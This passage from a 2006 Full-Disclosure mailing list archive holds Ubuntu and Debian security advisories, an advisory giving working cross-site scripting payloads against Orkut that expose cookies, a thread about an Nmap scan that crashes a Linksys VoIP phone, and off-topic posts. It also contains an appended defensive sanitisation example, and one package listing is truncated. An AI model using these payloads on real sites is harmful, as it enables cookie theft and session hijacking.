> take XML external DTD references as an example. If the XML parsers are used
> in default configuration or are not configured properly, scanning an XML
> with an external reference will result in requests to external sites. That
> is nice. This would allow an attacker to track malware distribution or
> download additional exploit files to the scanning system.
>
> With the release of Office 2007 a couple of days ago, which will have the
> Office Open XML format as standard storage format, the urge for XML enabled
> AV products will grow. My retesting today shows that the detection rate of
> Netsky as an embedded object in a Office 2003 Word XML is still at the same
> level as 3 months ago. I fear that the AV industry is not quite yet ready to
> protect their customers against XML delivered attacks.
>
> Kind regards
> Jan P. Monsch

--
Robert Q Kim, Wireless Internet Provider
http://evdo-coverage.com/satellite-wireless-internet.html
http://evdo-coverage.com
2611 S. Pacific Coast Highway 101 Suite 203
Cardiff by the Sea, CA 92007
206 984 0880

From kees at ubuntu.com Fri Dec 8 05:32:10 2006
From: kees at ubuntu.com (Kees Cook)
Date: Thu, 7 Dec 2006 21:32:10 -0800
Subject: [Full-disclosure] [USN-394-1] Ruby vulnerability
Message-ID: <20061208053210.GF30964@outflux.net>

===========================================================
Ubuntu Security Notice USN-394-1 December 08, 2006
ruby1.8 vulnerability
CVE-2006-6303
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 5.10
Ubuntu 6.06 LTS
Ubuntu 6.10

This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the following package versions:

Ubuntu 5.10:
  libruby1.8 1.8.2-9ubuntu1.4

Ubuntu 6.06 LTS:
  libruby1.8 1.8.4-1ubuntu1.3

Ubuntu 6.10:
  libruby1.8 1.8.4-5ubuntu1.2

In general, a standard system upgrade is sufficient to effect the necessary changes.

Details follow:

An error was found in Ruby's CGI library that did not correctly quote the boundary of multipart MIME requests. Using a crafted HTTP request, a remote user could cause a denial of service, where Ruby CGI applications would end up in a loop, monopolizing a CPU.
Updated packages for Ubuntu 5.10:

Updated packages for Ubuntu 6.06 LTS:
170916 cac9769a58b6342f8c3899be511c3ed5 http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/libruby1.8-dbg_1.8.4-1ubuntu1.3_powerpc.deb Size/MD5: 1030968 c07e36a6d9ad82df253498429af90194 http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/libruby1.8_1.8.4-1ubuntu1.3_powerpc.deb Size/MD5: 1507974 024b6a75642d9c980099fe5122db3926 http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libtcltk-ruby1.8_1.8.4-1ubuntu1.3_powerpc.deb Size/MD5: 1797652 f866baf3e948e8c0cb82f8bc42164a22 http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/ruby1.8-dev_1.8.4-1ubuntu1.3_powerpc.deb Size/MD5: 681354 6332169e99a1b8854f1fa49e222bbc39 http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/ruby1.8_1.8.4-1ubuntu1.3_powerpc.deb Size/MD5: 190534 0c3eec195c2af1ae11622349013f1b02 sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libdbm-ruby1.8_1.8.4-1ubuntu1.3_sparc.deb Size/MD5: 168468 2feee2e23f42bc51196a34dfe887534a http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libgdbm-ruby1.8_1.8.4-1ubuntu1.3_sparc.deb Size/MD5: 169308 065fbfef595dc1e71b7deb087112a9d3 http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libopenssl-ruby1.8_1.8.4-1ubuntu1.3_sparc.deb Size/MD5: 266540 856186fcac41e884293be044dc3b11b9 http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libreadline-ruby1.8_1.8.4-1ubuntu1.3_sparc.deb Size/MD5: 169088 4123bcc0f25fe4176511d2a7cf49f753 http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/libruby1.8-dbg_1.8.4-1ubuntu1.3_sparc.deb Size/MD5: 914846 c1db94b7243763c8f7f81d6157d15f5d http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/libruby1.8_1.8.4-1ubuntu1.3_sparc.deb Size/MD5: 1461434 b8b4a22294aa02db43d37d6236190cf3 http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libtcltk-ruby1.8_1.8.4-1ubuntu1.3_sparc.deb Size/MD5: 1793722 0ebc01fbaa7c26d1ac92cf456352e1de http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/ruby1.8-dev_1.8.4-1ubuntu1.3_sparc.deb Size/MD5: 703112 
d2de581e42b7924edc18d08738a60e43 http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/ruby1.8_1.8.4-1ubuntu1.3_sparc.deb Size/MD5: 188756 563ae96a873592e356b9af469185c0d0 Updated packages for Ubuntu 6.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/ruby1.8_1.8.4-5ubuntu1.2.diff.gz Size/MD5: 78132 d1054615aea1e6d8f5ce85a5aeca7a20 http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/ruby1.8_1.8.4-5ubuntu1.2.dsc Size/MD5: 1056 1c9ecef57d6a54500e4c44eb54c4ab4b http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/ruby1.8_1.8.4.orig.tar.gz Size/MD5: 4308915 2994203e0815ea978965de34287c5ea2 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/irb1.8_1.8.4-5ubuntu1.2_all.deb Size/MD5: 209356 940cfd4f5adfebb97ebe6566d487b74d http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/rdoc1.8_1.8.4-5ubuntu1.2_all.deb Size/MD5: 274256 97aacd569287256140ecb1f0baedeb7d http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/ri1.8_1.8.4-5ubuntu1.2_all.deb Size/MD5: 776630 53fcad620ec4804d6c1bdaab0e84d369 http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/ruby1.8-elisp_1.8.4-5ubuntu1.2_all.deb Size/MD5: 184108 9176d3556a58a0ef1267bd4e7f194872 http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/ruby1.8-examples_1.8.4-5ubuntu1.2_all.deb Size/MD5: 216396 6e16e795deebf7c996a6cc486092c5b1 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libdbm-ruby1.8_1.8.4-5ubuntu1.2_amd64.deb Size/MD5: 171788 7a1b57221e6d15bdf641d30140166e3e http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libgdbm-ruby1.8_1.8.4-5ubuntu1.2_amd64.deb Size/MD5: 172912 88e25578e336442ab5bc2dcb492b6773 http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libopenssl-ruby1.8_1.8.4-5ubuntu1.2_amd64.deb Size/MD5: 276190 934eacca56349c916d8bffeebcde7440 http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libreadline-ruby1.8_1.8.4-5ubuntu1.2_amd64.deb Size/MD5: 
172408 3fb4b79dbfe2a59b032556b6a09bddb3 http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/libruby1.8-dbg_1.8.4-5ubuntu1.2_amd64.deb Size/MD5: 1031924 04c179ab948ea9482edf29c83c4ec24e http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/libruby1.8_1.8.4-5ubuntu1.2_amd64.deb Size/MD5: 1513768 c39e5b9efa1dbf2f6db5bae881e498c6 http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libtcltk-ruby1.8_1.8.4-5ubuntu1.2_amd64.deb Size/MD5: 1799864 5cb8f2961b780786712e71ba524dab4a http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/ruby1.8-dev_1.8.4-5ubuntu1.2_amd64.deb Size/MD5: 720830 6a57f20eba15da71bcbc7291b213debf http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/ruby1.8_1.8.4-5ubuntu1.2_amd64.deb Size/MD5: 191360 f12ec94efca32e1f5d2e071741d4b50b i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libdbm-ruby1.8_1.8.4-5ubuntu1.2_i386.deb Size/MD5: 171182 fe3ee1a862bc36bee2d2ac1d358a7d4b http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libgdbm-ruby1.8_1.8.4-5ubuntu1.2_i386.deb Size/MD5: 171774 d19aabd75d984b4ce0e7a6827e7a48e9 http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libopenssl-ruby1.8_1.8.4-5ubuntu1.2_i386.deb Size/MD5: 263464 035daa12b3a422e75c476ecdd0aa8a8c http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libreadline-ruby1.8_1.8.4-5ubuntu1.2_i386.deb Size/MD5: 171544 b6a7e4a12be94ceac0fe32fb6465d20e http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/libruby1.8-dbg_1.8.4-5ubuntu1.2_i386.deb Size/MD5: 959940 207404c443999aa6f600b70506a39430 http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/libruby1.8_1.8.4-5ubuntu1.2_i386.deb Size/MD5: 1450948 ab350df20b70a1d8bfe39abb6c1d6c25 http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libtcltk-ruby1.8_1.8.4-5ubuntu1.2_i386.deb Size/MD5: 1793708 3b1b202266d6f6c4802551b3865d4d48 http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/ruby1.8-dev_1.8.4-5ubuntu1.2_i386.deb Size/MD5: 682612 a328c822974314a358d324032efa7dbf 
http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/ruby1.8_1.8.4-5ubuntu1.2_i386.deb Size/MD5: 191132 52a0cc45a6c914d8266fc5edd0bf6648 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libdbm-ruby1.8_1.8.4-5ubuntu1.2_powerpc.deb Size/MD5: 173318 f926720946b2df30c66c62f7a66aaba8 http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libgdbm-ruby1.8_1.8.4-5ubuntu1.2_powerpc.deb Size/MD5: 173864 04b680e0347869403a09cf9f630c9a55 http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libopenssl-ruby1.8_1.8.4-5ubuntu1.2_powerpc.deb Size/MD5: 267234 17a196d0c1b485cd571c42adfc77689d http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libreadline-ruby1.8_1.8.4-5ubuntu1.2_powerpc.deb Size/MD5: 173520 2dd8d2f8ce3c53c39fa820eaa2a9a0e0 http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/libruby1.8-dbg_1.8.4-5ubuntu1.2_powerpc.deb Size/MD5: 1069614 2280c70cdf9d1c98f659b4a58ccca045 http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/libruby1.8_1.8.4-5ubuntu1.2_powerpc.deb Size/MD5: 1520688 29af64f8ac3edc9a22c3d41df27ad5c7 http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libtcltk-ruby1.8_1.8.4-5ubuntu1.2_powerpc.deb Size/MD5: 1800718 4bdef6264f711486ae09988fd8871282 http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/ruby1.8-dev_1.8.4-5ubuntu1.2_powerpc.deb Size/MD5: 689070 42cebb7853832c61cc99ee7b4b9c02d8 http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/ruby1.8_1.8.4-5ubuntu1.2_powerpc.deb Size/MD5: 193214 12971cfc5aea7409c5c380b53446c547 sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libdbm-ruby1.8_1.8.4-5ubuntu1.2_sparc.deb Size/MD5: 170924 6e57c642a819e0dc9b00a71585477865 http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libgdbm-ruby1.8_1.8.4-5ubuntu1.2_sparc.deb Size/MD5: 171704 476e1774fadd13553c6d64b21e27fd8c http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libopenssl-ruby1.8_1.8.4-5ubuntu1.2_sparc.deb Size/MD5: 
From rajesh.sethumadhavan at yahoo.com Fri Dec 8 07:26:07 2006
From: rajesh.sethumadhavan at yahoo.com (Rajesh Sethumadhavan)
Date: Thu, 7 Dec 2006 23:26:07 -0800 (PST)
Subject: [Full-disclosure] Orkut Multiple Cross Site Scripting Vulnerabilities
Message-ID: <893889.65198.qm@web37212.mail.mud.yahoo.com>

Orkut Multiple Cross Site Scripting Vulnerabilities
#####################################################################
XDisclose Advisory      : XD100092
Vulnerability Discovered: November 18th 2006
Advisory Released       : December 08th 2006
Credit                  : Rajesh Sethumadhavan
Class                   : Cross Site Scripting
                          HTML Injection
Severity                : Medium
Solution Status         : Unpatched
Vendor                  : Google Inc
Vendor Website          : http://www.orkut.com
Affected applications   : Orkut Services
Affected Platform       : All
#####################################################################

Overview:

Orkut is an Internet social network service run by Google and named after its creator, Orkut Büyükkökten. It claims to be designed to help users meet new friends and maintain existing relationships with pictures and messages, and establish new ones by reaching out to people you've never met before.

The Orkut service is vulnerable to Cross-Site Scripting and HTML Injection. This is caused by improper validation of user-supplied input.

Description:

A remote attacker can craft a GET request with the XSS payload as demonstrated below. When the victim clicks on the GET request the payload will get executed, which results in stealing of cookie, IP info, referer info, browser information, clipboard content, operating system info, hardware info, modification of page or HTML injection, URL redirection, port scanning of the network, and even phishing is possible.

1) Orkut Invite XSS:

The flaws are due to improper sanitization of input passed to the 'continue' parameter in the GET request.
-------------------------------------------------------------------
http://www.orkut.com/Invite.aspx?continue=javascript:alert(document.cookie)
------------------------------------------------------------------

Demonstration:
Note: Demonstration leads to your personal information disclosure
- Login to your orkut account
- Paste the above URL
- Click on BACK button
- Orkut Cookies will get displayed

In the same way, HTML injection is also possible.

Vulnerable Code:
------------------------------------------------------------------
------------------------------------------------------------------

2) Orkut Next page XSS:

The flaws are due to improper sanitization of input passed to the 'nid' parameter in the GET request.
This vulnerability was already fixed 2 days earlier.

GET request with XSS payload:
------------------------------------------------------------------
http://www.orkut.com/Scrapbook.aspx?uid=3595989687719502785&pageSize=&na=3&nst=-2&nid=13550271097807907792-%22};%20alert('Xdisclose');%20function%20tt(){//
------------------------------------------------------------------

Vulnerable Code:
------------------------------------------------------------------
function changePageSize(value) {
  window.location="/Scrapbook.aspx?uid=3595989687719502785&na=1&nst=1&nid=13550271097807907792-"}; alert('Xdisclose'); function tt(){//&pageSize="+value;
}
------------------------------------------------------------------

Solution:

Orkut can improve their filters by disallowing certain characters like " <>/\?&`~!@#$%^*()[]|;:"' " in user input URLs.

Screenshot:
http://www.xdisclose.com/Images/xdorkutinvitexss.jpg

Impact:

Successful exploitation allows execution of arbitrary script code in a user's browser session in the context of an affected site, which results in stealing of cookie, IP info, referer info, browser information, clipboard content, operating system info, Referer info, hardware info, modification of page or HTML injection (temporary webpage defacement), modification of page title, hijacking page flow, URL redirection, port scanning of the victim's network, and even phishing is possible. Impact of the vulnerability is network level.

Original Advisory:
http://www.xdisclose.com/XD100092.txt

Credits:

Rajesh Sethumadhavan has been credited with the discovery of this vulnerability.

Disclaimer:

This entire document is strictly for educational, testing and demonstrating purpose only. Modification use and/or publishing this information is entirely on your own risk. The exploit code is to be used on your own orkut account. I am not liable for any direct or indirect damages caused as a result of using the information or demonstrations provided in any part of this advisory.
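As an added example (not part of the advisory and not Orkut's code), the following Node.js snippet shows the server-side handling that would close both holes described above: a redirect parameter restricted to same-site relative paths, and the nid value encoded before it is placed in the inline script. The function names, the fallback path, the site origin constant and the small test harness are assumptions; the nid payload is the one quoted in the advisory.

```javascript
// Added example (not from the advisory or from Orkut): how a server could
// handle the two parameters the advisory describes. Function names, the
// fallback path and SITE_ORIGIN are assumptions for illustration.

const SITE_ORIGIN = "https://www.orkut.com";

// 1) A "continue"-style redirect parameter. Only a relative path on this
//    site is accepted; "javascript:alert(document.cookie)", "data:", an
//    absolute URL or a protocol-relative "//host" all fall back to a safe page.
function safeContinueUrl(value, fallback = "/Home.aspx") {
  if (typeof value !== "string" || value.length === 0) return fallback;
  // Require a single leading "/" and none of the characters browsers are
  // lenient about (backslash, CR/LF, NUL).
  if (!/^\/(?!\/)/.test(value) || /[\\\r\n\u0000]/.test(value)) return fallback;
  let parsed;
  try {
    parsed = new URL(value, SITE_ORIGIN + "/");
  } catch (e) {
    return fallback;
  }
  // Defence in depth: anything that resolves to another origin (or to the
  // "null" origin of a javascript: URL) is refused.
  if (parsed.origin !== SITE_ORIGIN) return fallback;
  return parsed.pathname + parsed.search;
}

// 2) The "nid" value ends up inside an inline script. It must become a
//    JavaScript string literal, never raw text: JSON.stringify escapes quotes,
//    backslashes and line terminators, and "<" is escaped as well so that
//    "</script>" inside the value cannot end the script block early.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, "\\u003c")
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029");
}

// Builds the same changePageSize() function the advisory quotes, but with
// uid and nid URL-encoded and the whole path emitted as one string literal.
function buildChangePageSizeScript(uid, nid) {
  const path = "/Scrapbook.aspx?uid=" + encodeURIComponent(uid) +
               "&na=1&nst=1&nid=" + encodeURIComponent(nid) + "&pageSize=";
  return "function changePageSize(value) { window.location=" +
         jsStringLiteral(path) + "+encodeURIComponent(value); }";
}

// Test harness (assumed, not browser code): run a generated script against a
// stand-in window object and return the location it sets, so we can show the
// payload is carried along as inert text instead of being executed.
function runChangePageSize(script, value) {
  const fakeWindow = { location: null };
  new Function("window", "value", script + "\nchangePageSize(value);")(fakeWindow, value);
  return fakeWindow.location;
}

// Constructed inputs: the uid and the nid payload quoted in the advisory.
const SAMPLE_UID = "3595989687719502785";
const SAMPLE_NID_PAYLOAD = "13550271097807907792-\"}; alert('Xdisclose'); function tt(){//";

console.log(safeContinueUrl("javascript:alert(document.cookie)"));      // /Home.aspx
console.log(safeContinueUrl("/Scrapbook.aspx?uid=" + SAMPLE_UID));     // unchanged
console.log(runChangePageSize(buildChangePageSizeScript(SAMPLE_UID, SAMPLE_NID_PAYLOAD), "25"));
```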
From shawnmer at gmail.com Fri Dec 8 06:53:07 2006
From: shawnmer at gmail.com (Shawn Merdinger)
Date: Thu, 7 Dec 2006 22:53:07 -0800
Subject: [Full-disclosure] Linksys WIP 330 VoIP wireless phone crash fromNmap scan
In-Reply-To:
References:
Message-ID:

Hi,

Yes, this is an extraordinarily lame bug, but that's sort of the point with many of these VoIP phones, both wired and wireless. They are a new class of device going onto networks and tend to be kind of sucky when it comes to what I'd consider *expected customer environment tool runs* like Nmap and Nessus, not to mention plenty of others such as ISIC, Protos, Asteroid, ...and that's just sticking with the free stuff.

I didn't find the bug anyways, I just reported it to Linksys and then FD. And even though I'm poking around with a bunch of VoIP phones on my own time and dime, I don't own one of these WIP 330s.

Anyway, you seem happy with your WIP 330...once you got it configured...
http://www.trixbox.org/modules/newbb/viewtopic.php?topic_id=5974&forum=3#forumpost23445

Say, if you have the cycles for some free vendor QA, and since you have a WIP 330 in hand, maybe you can find something much cooler with that PhoneCtl.exe crash and get back to us?

Thanks,
--scm

On 12/7/06, pingywon wrote:
>
> "The crash
> > appears related to PhoneCtl.exe running on the phone's Windows CE 4.2
> > operating system."
>
> "Let me take a look at that screenshot again..."
>
> http://www.flickr.com/photos/metalmijn/295348294/
>
> "Heck buddy, you appear correct"
>
> ~p
>
> ----- Original Message -----
> From: "Shawn Merdinger"
> To:
> Sent: Wednesday, December 06, 2006 1:40 PM
> Subject: [Full-disclosure] Linksys WIP 330 VoIP wireless phone crash
> fromNmap scan
>
> > Vulnerability Description
> > ==================
> > The Linksys WIP 330 VoIP wireless phone will crash when a full
> > port-range Nmap scan is run against its IP address.
> >
> > Linksys WIP 330 Firmware Version
> > ==========================
> > 1.00.06A
> >
> > Nmap scan command
> > ================
> > nmap -P0 -p 1-65535
> >
> > Impact
> > =====
> > The crash is only after Nmap has finished. The Nmap scan also seems to
> > disrupt updating of the display as the clock is not updated. The crash
> > appears related to PhoneCtl.exe running on the phone's Windows CE 4.2
> > operating system.
> >
> > Screenshot of the crash: http://www.flickr.com/photos/metalmijn/295348294/
> >
> > Credit
> > ====
> > Credit for discovering this vulnerability goes to Armijn Hemel
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/

From radules at telekom.yu Fri Dec 8 13:31:52 2006
From: radules at telekom.yu (solenoid (lists))
Date: Fri, 08 Dec 2006 14:31:52 +0100
Subject: [Full-disclosure] What was the name of the web site ...
Message-ID: <45796948.8070604@telekom.yu>

... that keeps track of MS vulnerabilities, patches and the corresponding exploits? I know that it was mentioned earlier in this list but can not remember the URL right now...

TIA

From lwang at lwang.org Fri Dec 8 13:50:40 2006
From: lwang at lwang.org (Louis Wang)
Date: Fri, 8 Dec 2006 21:50:40 +0800
Subject: [Full-disclosure] Google pageranked 4 doamin on sale...
Message-ID: <21ae1b060612080550x24e0ed4fg4dc2340e7b02b67e@mail.gmail.com>

hi, there:

I don't know whether it is the right place to post this message, but the web site is security related in my original thought.

I'd like to sell my web site http://www.lwang.org. It has google pageranked 4, and full control of domain. The web server is in Czech, it has 500M space and 5G traffic per month.

Anyone interested in it, please contact me.

Thanks.

From pingywon at hotmail.com Fri Dec 8 15:10:16 2006
From: pingywon at hotmail.com (pingywon)
Date: Fri, 8 Dec 2006 10:10:16 -0500
Subject: [Full-disclosure] Linksys WIP 330 VoIP wireless phone crash fromNmap scan
References:
Message-ID:

They are truly a "fragile" class of new devices. I bought the overpriced WIP330 for testing myself. And minus the rather good screen brightness and resolution I'm pretty disappointed with it (it's just a cumbersome phone). But as long as Cisco is still selling their gray scale wifi phone for $500 I consider it a deal.

----- Original Message -----
From: "Shawn Merdinger"
To: "pingywon" ;
Sent: Friday, December 08, 2006 1:53 AM
Subject: Re: [Full-disclosure] Linksys WIP 330 VoIP wireless phone crash fromNmap scan

> Hi,
>
> Yes, this is an extraordinarily lame bug, but that's sort of the point
> with many of these VoIP phones, both wired and wireless. They are a
> new class of device going onto networks and tend to be kind of sucky
> when it comes to what I'd consider *expected customer environment tool
> runs* like Nmap and Nessus, not to mention plenty of others such as
> ISIC, Protos, Asteroid, ...and that's
> just sticking with the free stuff.
>
> I didn't find the bug anyways, I just reported it to Linksys and then
> FD. And even though I'm poking around with a bunch of VoIP phones on
> my own time and dime, I don't own one of these WIP 330s.
>
> Anyway, you seem happy with your WIP 330...once you got it configured...
> http://www.trixbox.org/modules/newbb/viewtopic.php?topic_id=5974&forum=3#forumpost23445
>
> Say, if you have the cycles for some free vendor QA, and since you
> have a WIP 330 in hand, maybe you can find something much cooler with
> that PhoneCtl.exe crash and get back to us?
>
> Thanks,
> --scm
>
> On 12/7/06, pingywon wrote:
>>
>> "The crash
>> > appears related to PhoneCtl.exe running on the phone's Windows CE 4.2
>> > operating system."
>>
>> "Let me take a look at that screenshot again..."
>>
>> http://www.flickr.com/photos/metalmijn/295348294/
>>
>> "Heck buddy, you appear correct"
>>
>> ~p
>>
>> ----- Original Message -----
>> From: "Shawn Merdinger"
>> To:
>> Sent: Wednesday, December 06, 2006 1:40 PM
>> Subject: [Full-disclosure] Linksys WIP 330 VoIP wireless phone crash
>> fromNmap scan
>>
>> > Vulnerability Description
>> > ==================
>> > The Linksys WIP 330 VoIP wireless phone will crash when a full
>> > port-range Nmap scan is run against its IP address.
>> >
>> > Linksys WIP 330 Firmware Version
>> > ==========================
>> > 1.00.06A
>> >
>> > Nmap scan command
>> > ================
>> > nmap -P0 -p 1-65535
>> >
>> > Impact
>> > =====
>> > The crash is only after Nmap has finished. The Nmap scan also seems to
>> > disrupt updating of the display as the clock is not updated. The crash
>> > appears related to PhoneCtl.exe running on the phone's Windows CE 4.2
>> > operating system.
>> >
>> > Screenshot of the crash:
>> > http://www.flickr.com/photos/metalmijn/295348294/
>> >
>> > Credit
>> > ====
>> > Credit for discovering this vulnerability goes to Armijn Hemel
>> >
>> > _______________________________________________
>> > Full-Disclosure - We believe in it.
>> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> > Hosted and sponsored by Secunia - http://secunia.com/
>> >
>>
>

From skx at debian.org Fri Dec 8 15:30:27 2006
From: skx at debian.org (Steve Kemp)
Date: Fri, 8 Dec 2006 15:30:27 +0000
Subject: [Full-disclosure] [SECURITY] [DSA-1230-1] new l2tpns packages fix buffer overflow
Message-ID: <20061208153027.GA24274@steve.org.uk>

------------------------------------------------------------------------
Debian Security Advisory DSA-1230-1                  security at debian.org
http://www.debian.org/security/                               Steve Kemp
December 08, 2006
------------------------------------------------------------------------

Package        : l2tpns (2.0.14-1sarge1)
Vulnerability  : buffer overflow
Problem type   : remote
Debian-specific: no
CVE Id(s)      : CVE-2006-5873
Debian Bug     : 401742

Rhys Kidd discovered a vulnerability in l2tpns, a layer 2 tunnelling protocol network server, which could be triggered by a remote user to execute arbitrary code.

For the stable distribution (sarge), this problem has been fixed in version 2.0.14-1sarge1.

For the unstable distribution (sid) this problem has been fixed in version 2.1.21-1.

We recommend that you upgrade your l2tpns package.

Upgrade instructions
--------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.

Debian 3.1 (stable)
-------------------

Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, m68k, mips, mipsel, powerpc, s390 and sparc.
These files will probably be moved into the stable distribution on its next update.

---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show ' and http://packages.debian.org/

From dudevanwinkle at gmail.com Fri Dec 8 16:37:43 2006
From: dudevanwinkle at gmail.com (Dude VanWinkle)
Date: Fri, 8 Dec 2006 11:37:43 -0500
Subject: [Full-disclosure] Google pageranked 4 doamin on sale...
In-Reply-To: <21ae1b060612080550x24e0ed4fg4dc2340e7b02b67e@mail.gmail.com>
References: <21ae1b060612080550x24e0ed4fg4dc2340e7b02b67e@mail.gmail.com>
Message-ID:

On 12/8/06, Louis Wang wrote:
> I'd like to sell my web site http://www.lwang.org. It has google
> pageranked 4, and full control of domain. The web server is in Czech,
> it has 500M space and 5G traffic per month.

is it pageranked #4 for the word "wang"?

what is the Czech word for Willie the One Eyed Wonder Weasel??
anyways, if you are going to try and sell a site based on its rank, and assuming you aren't talking about smell, you might want to include the category. Even though you said it's a security-related site, the content isn't always a guarantee of the category it is associated with; see: disney pr0n googlebombing, etc, etc.

We could look it up, but not only are FD'ers notoriously lazy, as you are the "salesman" you might want to try and attract lazy marks,.. err buyers.

-JP

Bonus wang link with a hat-tip to Larry Seltzer for providing it, maybe NSFW depending on where you W:
http://www.starma.com/penis/penis.html

From researchonhackers at yahoo.com Fri Dec 8 16:32:35 2006
From: researchonhackers at yahoo.com (Thomas Holt)
Date: Fri, 8 Dec 2006 08:32:35 -0800 (PST)
Subject: [Full-disclosure] Call For Participants For A Research Study Of Hacker Culture
Message-ID: <20061208163235.15537.qmail@web58915.mail.re1.yahoo.com>

Greetings,

My name is Tom Holt, and I am an Assistant Professor at the University of North Carolina at Charlotte. I am currently conducting a study of hackers and hacking and am seeking interested men and women who may be willing to participate. The purpose of this research is to understand the ways that people become interested in computers and hacking, their motives for hacking, and how they apply their skills in different settings. This study will also consider individuals' conceptions of hacking and experiences in hacker culture.

To understand this phenomenon, I am seeking individuals who are willing to share their experiences and opinions in an interview which can be conducted either in person or via encrypted e-mail. Strict confidentiality will be maintained and your privacy ensured. I have obtained a Certificate of Confidentiality from the National Institutes of Health to further protect and ensure your privacy and confidentiality.
All individuals who complete an interview will be paid $10 for their time, and $10 will also be paid for successful referrals. If you know anyone who is, or considers his/herself to be a hacker and is willing to be interviewed, please contact me via email at tjholt at uncc.edu, at researchonhackers at yahoo.com, or by phone at 704-795-9544. Again, strict confidentiality will be maintained and your privacy ensured. I am not a law enforcement agent nor connected with any law enforcement agency and am not looking to hear crazy stories about how you hacked NASA. If you have, great, but I realize there is more to hacking than simple media conceptions of the hacker as a criminal. Instead, I am interested in understanding hacking from the hackers? point of view. I have presented my research and described this project at several cons, including CarolinaCon 06, PhreakNIC X, and Defcons 13/14 and am hoping to hear from more individuals in the community. Please contact me if you are interested, and I look forward to hearing from you. Thank you, Thomas J. Holt, Ph. D. ____________________________________________________________________________________ Yahoo! Music Unlimited Access over 1 million songs. http://music.yahoo.com/unlimited -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061208/6fd63309/attachment.html From jan.monsch at iplosion.com Fri Dec 8 17:05:29 2006 From: jan.monsch at iplosion.com (Jan P. Monsch) Date: Fri, 8 Dec 2006 18:05:29 +0100 Subject: [Full-disclosure] Enforcing Java Security Manager in Restricted Windows Environments? Message-ID: <00bc01c71aeb$1393ab70$8210a8c0@moon1> Hi Lately I came across several Citrix and Terminal Server projects which provide a restricted set of applications to their users. This is achieved using Windows Software Restriction Policies or AppSense Application Manager to white or black list executables. 
